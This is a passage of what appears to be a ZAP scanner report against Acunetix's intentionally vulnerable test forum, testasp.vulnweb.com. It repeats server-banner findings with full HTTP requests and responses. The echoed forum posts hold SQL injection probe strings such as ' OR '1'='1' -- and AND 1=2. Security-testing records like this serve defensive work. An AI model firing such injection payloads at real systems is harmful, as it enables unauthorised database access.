Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:37 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>%" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=11 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3069 |
| Response Body - size: 3,069 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=12 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3070 |
| Response Body - size: 3,070 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> AND 1=2 -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=13 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=13 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=13 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D13" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:29 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' OR '1'='1' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=14 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=14 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=14 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:38 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D14" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>' AND '1'='2' -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=15 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=15 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=15 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3074 |
| Response Body - size: 3,074 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D15" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" OR "1"="1" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=16 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=16 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=16 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3075 |
| Response Body - size: 3,075 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D16" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'>" AND "1"="2" -- </div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=17 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=17 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Content-Type: application/x-www-form-urlencoded Referer: http://testasp.vulnweb.com/showthread.asp?id=17 Content-Length: 21 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 21 bytes. |
tfSubject=ZAP&tfText=
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:39 GMT Content-Length: 3065 |
| Response Body - size: 3,065 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum 42 </title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --><!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">login</a> - <a href="./Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D17" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <div class="path"> <a href="showforum.asp?id=0">Acunetix Web Vulnerability Scanner</a>/42 </div> <table width="100%" cellspacing="1" cellpadding="5" bgcolor="#E5E5E5"> <tr><td valign='top' align='center' bgcolor='#FFFFFF' width='120'><img src='avatars/noavatar.gif'><br>posted by <b>Pedro Miguel</b> on 3/13/2022 10:10:30 AM</td><td valign='top' bgcolor='#FFFFFF'><div class='posttitle'>42 - 79.125.25.187</div><div class='posttext'> OR 1=1</div></td></tr> </table> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/showthread.asp?id=18 |
| Method | POST |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 409 bytes. |
POST http://testasp.vulnweb.com/showthread.asp?id=18 HTTP/1.1
